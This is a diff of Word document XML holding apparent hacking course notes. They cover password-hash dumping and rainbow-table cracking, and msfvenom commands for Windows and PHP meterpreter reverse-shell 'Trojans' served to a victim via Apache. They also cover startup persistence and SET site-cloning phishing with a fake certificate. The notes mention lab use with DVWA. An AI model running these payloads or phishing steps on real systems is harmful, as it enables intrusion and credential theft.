-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. The last step will be finding out which password combination in the dictionary contains the same </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hashcode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> as the data from the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hashdump</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>. If it found out any match then you struck gold.</w:t>
+        <w:t xml:space="preserve">Now if we see overview of the procedure first we start with getting the password hashdump from the system now we will build a dictionary based on the hashdump. The dictionary built contains the </w:t>
+      </w:r>
+      <w:r>
+        <w:t>different combinations of selected type (it may be a lower alpha , upper alpha, numeric , symbol or a combination of any) along with their hashcode. The last step will be finding out which password combination in the dictionary contains the same hashcode as the data from the hashdump. If it found out any match then you struck gold.</w:t>
       </w:r>
     </w:p>
     <w:p/>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Tools to be used = pwdump7, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>winrtgen</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> and</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>RainbowCrack</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Tools to be used = pwdump7, winrtgen and</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> RainbowCrack</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:t xml:space="preserve">The </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -10543,83 +9333,47 @@
         <w:t xml:space="preserve">pwdump7 </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> is</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> used for getting the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hashcode</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> of a system . The </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve"> is used for getting the hashcode of a system . The </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>winrtgen</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">winrtgen </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">creates a dictionary and the </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">creates a dictionary and the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">RainbowCrack </w:t>
+      </w:r>
+      <w:r>
+        <w:t>to check for any matches.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">All of the </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">tools used above have GUI except for pwdump7. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">In pwdump7 use the code: </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>RainbowCrack</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>to check for any matches.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">All of the </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve">tools used above have GUI except for pwdump7. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">In pwdump7 use the code: </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
         <w:t>pwdump7.exe&gt;filename.txt</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">. This file contains the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>hascodes</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. </w:t>
+        <w:t xml:space="preserve">. This file contains the hascodes. </w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -10635,12 +9389,10 @@
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:lastRenderedPageBreak/>
         <w:t>Metasploit</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p/>
     <w:p>
@@ -10650,15 +9402,7 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">We can create payloads in </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Metasploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>.</w:t>
+        <w:t>We can create payloads in Metasploit.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10675,15 +9419,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t>Ensure both the systems are in the same network .[</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>i.e</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> connected in dome manner]</w:t>
+        <w:t>Ensure both the systems are in the same network .[i.e connected in dome manner]</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10713,29 +9449,13 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Open </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Metasploit</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> console. Code- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">Open Metasploit console. Code- </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>msfconsole</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>.</w:t>
+        <w:t>msfconsole.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10747,105 +9467,13 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Create a Trojan </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>( this</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> helps us in connecting with the back door).                                                        Code-</w:t>
+        <w:t>Create a Trojan ( this helps us in connecting with the back door).                                                        Code-</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>msfvenom</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> –p windows/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>meterpreter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>reverse_tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> LHOST=&lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>hackerip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>&gt; LPORT=&lt;port&gt; -f &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>filetype</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>&gt; &gt; &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>filename.filetype</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>&gt;</w:t>
+        <w:t xml:space="preserve"> msfvenom –p windows/meterpreter/reverse_tcp LHOST=&lt;hackerip&gt; LPORT=&lt;port&gt; -f &lt;filetype&gt; &gt; &lt;filename.filetype&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10853,23 +9481,7 @@
         <w:ind w:left="720"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">The code given above creates a payload of type windows with reverse </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">. Reverse </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> means connection is given back.</w:t>
+        <w:t>The code given above creates a payload of type windows with reverse tcp. Reverse tcp means connection is given back.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10889,15 +9501,7 @@
         </w:numPr>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Now since we don’t have any means to send the payload to the victims here we are just sending it to the </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>victims</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> computer with the help of apache server.</w:t>
+        <w:t>Now since we don’t have any means to send the payload to the victims here we are just sending it to the victims computer with the help of apache server.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -10929,47 +9533,11 @@
       <w:r>
         <w:t xml:space="preserve">            </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>Cp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Trojan.filetype</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>var</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>/www/html</w:t>
+        <w:t>Cp Trojan.filetype /var/www/html</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve"> this puts the file in the server.</w:t>
@@ -11069,71 +9637,21 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve"> set payload windows/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
+        <w:t xml:space="preserve"> set payload windows/meterpreter/reverse_tcp</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>meterpreter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>reverse_tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">            Set LHOST &lt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>hacher</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>&gt;</w:t>
+        <w:t xml:space="preserve">            Set LHOST &lt;hacher Ip&gt;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11250,21 +9768,30 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>? [</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+        <w:t>? [gives all available options]</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>gives</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve"> all available options]</w:t>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Note : The first we need to do after a hack is to find a way to maintain the hack. Here in this case we can put this Trojan file into start up so that the file executes when ever the system is turned on.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11282,90 +9809,32 @@
           <w:b/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="gramStart"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Social Engineering </w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t>Social means being with people and engineering means creating something. Together we can say social engineering is creating something that will be with being and do what it is designed to do.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Note :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> The first we need to do after a hack is to find a way to maintain the hack. Here in this case we can put this Trojan file into start up so that the file executes </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>when ever</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve"> the system is turned on.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading2"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Social Engineering </w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:r>
-        <w:t>Social means being with people and engineering means creating something. Together we can say social engineering is creating something that will be with being and do what it is designed to do.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>Netcraft</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t xml:space="preserve">- </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>Netcraft</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> provide internet security services including </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId115" w:history="1">
+        <w:t xml:space="preserve">Netcraft- </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Netcraft provide internet security services including </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId116" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -11376,7 +9845,7 @@
       <w:r>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
-      <w:hyperlink r:id="rId116" w:history="1">
+      <w:hyperlink r:id="rId117" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -11387,7 +9856,7 @@
       <w:r>
         <w:t xml:space="preserve"> and </w:t>
       </w:r>
-      <w:hyperlink r:id="rId117" w:history="1">
+      <w:hyperlink r:id="rId118" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -11398,7 +9867,7 @@
       <w:r>
         <w:t xml:space="preserve">. We also analyse many aspects of the internet, including the </w:t>
       </w:r>
-      <w:hyperlink r:id="rId118" w:tgtFrame="_blank" w:history="1">
+      <w:hyperlink r:id="rId119" w:tgtFrame="_blank" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -11409,7 +9878,7 @@
       <w:r>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
-      <w:hyperlink r:id="rId119" w:history="1">
+      <w:hyperlink r:id="rId120" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -11420,7 +9889,7 @@
       <w:r>
         <w:t xml:space="preserve">, </w:t>
       </w:r>
-      <w:hyperlink r:id="rId120" w:history="1">
+      <w:hyperlink r:id="rId121" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -11431,7 +9900,7 @@
       <w:r>
         <w:t xml:space="preserve"> and </w:t>
       </w:r>
-      <w:hyperlink r:id="rId121" w:history="1">
+      <w:hyperlink r:id="rId122" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="Hyperlink"/>
@@ -11453,16 +9922,8 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>SET [Social engineering tools</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-        </w:rPr>
-        <w:t>]-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>SET [Social engineering tools]-</w:t>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve"> This is a suite in kali that provides you with different tools to perform attacks.</w:t>
       </w:r>
@@ -11477,25 +9938,7 @@
         <w:t xml:space="preserve">We need to select </w:t>
       </w:r>
       <w:r>
-        <w:t>the second option [</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>i.e</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> social engineering tool kit] later need to select credential harvesting method and we need to clone a website. It asks for a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>url</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> to clone and the rest is as simple as a GUI wizard. If followed properly the phishing website will be up and running the rest is up to you how to make your victim make a login in the same site.</w:t>
+        <w:t>the second option [i.e social engineering tool kit] later need to select credential harvesting method and we need to clone a website. It asks for a url to clone and the rest is as simple as a GUI wizard. If followed properly the phishing website will be up and running the rest is up to you how to make your victim make a login in the same site.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11503,15 +9946,7 @@
         <w:t xml:space="preserve">There is a possibility </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">that few of the site have tools that block the cloning of websites. To get around this we need to use </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>certificate(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>obviously a fake one) to bluff.</w:t>
+        <w:t>that few of the site have tools that block the cloning of websites. To get around this we need to use certificate(obviously a fake one) to bluff.</w:t>
       </w:r>
     </w:p>
     <w:p/>
@@ -11542,38 +9977,17 @@
     </w:p>
     <w:p>
       <w:r>
-        <w:t xml:space="preserve">Now obviously since we cannot attack a live website for fun sake or even seriously until and unless if requested by the owner this OWASP project helps us in understanding the different attacks that we can perform on a web server. To put forward this concept simply we can say this is an OS that acts like </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>an</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> server and allows us to attack it.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">How to run OWASP: IT is similar to all other OS but this is CUI only. If You have the virtual ready disk it’s more </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>simple .</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">The OWASP pages can be accesses from the web browser for different attacks. The </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>DVWA(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>damn vulnerability web attacks ) contains the pages on which different we attacks can be done.</w:t>
+        <w:t>Now obviously since we cannot attack a live website for fun sake or even seriously until and unless if requested by the owner this OWASP project helps us in understanding the different attacks that we can perform on a web server. To put forward this concept simply we can say this is an OS that acts like an server and allows us to attack it.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>How to run OWASP: IT is similar to all other OS but this is CUI only. If You have the virtual ready disk it’s more simple .</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>The OWASP pages can be accesses from the web browser for different attacks. The DVWA(damn vulnerability web attacks ) contains the pages on which different we attacks can be done.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11602,60 +10016,47 @@
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve">Solution: Validate </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+        <w:t>Solution: Validate the uploads and the entries in the text areas before taking in.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>This is done in similar fashion to java and windows payload attacks. Here we will be creating a php file instead of a .exe file and upload it to the we site. This when execute will open the backdoor to the attacker.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Since there are some issues with the new kali venom tools use old kali payload tool for this experiment.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">For creating a payload: </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>the uploads</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">msfvenom –p php/meterpreter/reverse_tcp </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> lhost=ip lport=port </w:t>
+      </w:r>
+      <w:r>
+        <w:t>–f raw&gt;filename.php</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t xml:space="preserve"> and the entries in the text areas before taking in.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">This is done in similar fashion to java and windows payload attacks. Here we will be creating a </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> file instead of </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>a</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> .exe file and upload it to the </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>we</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> site. This when execute will open the backdoor to the attacker.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Since there are some issues with the new kali venom tools use old kali payload tool for this experiment.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">For creating a payload: </w:t>
+        <w:t>{using venom}</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -11664,180 +10065,19 @@
           <w:b/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>msfvenom</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> –p </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>meterpreter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>reverse_tcp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lhost</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t>=</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>ip</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lport</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve">=port </w:t>
-      </w:r>
-      <w:r>
-        <w:t>–f raw&gt;</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>filename.php</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
+      <w:r>
+        <w:t xml:space="preserve">msfpayload php/meterpreter/reverse_tcp lhost=ip lport=port R &gt;filename.php </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:b/>
         </w:rPr>
-        <w:t>{using venom}</w:t>
-      </w:r>
-    </w:p>
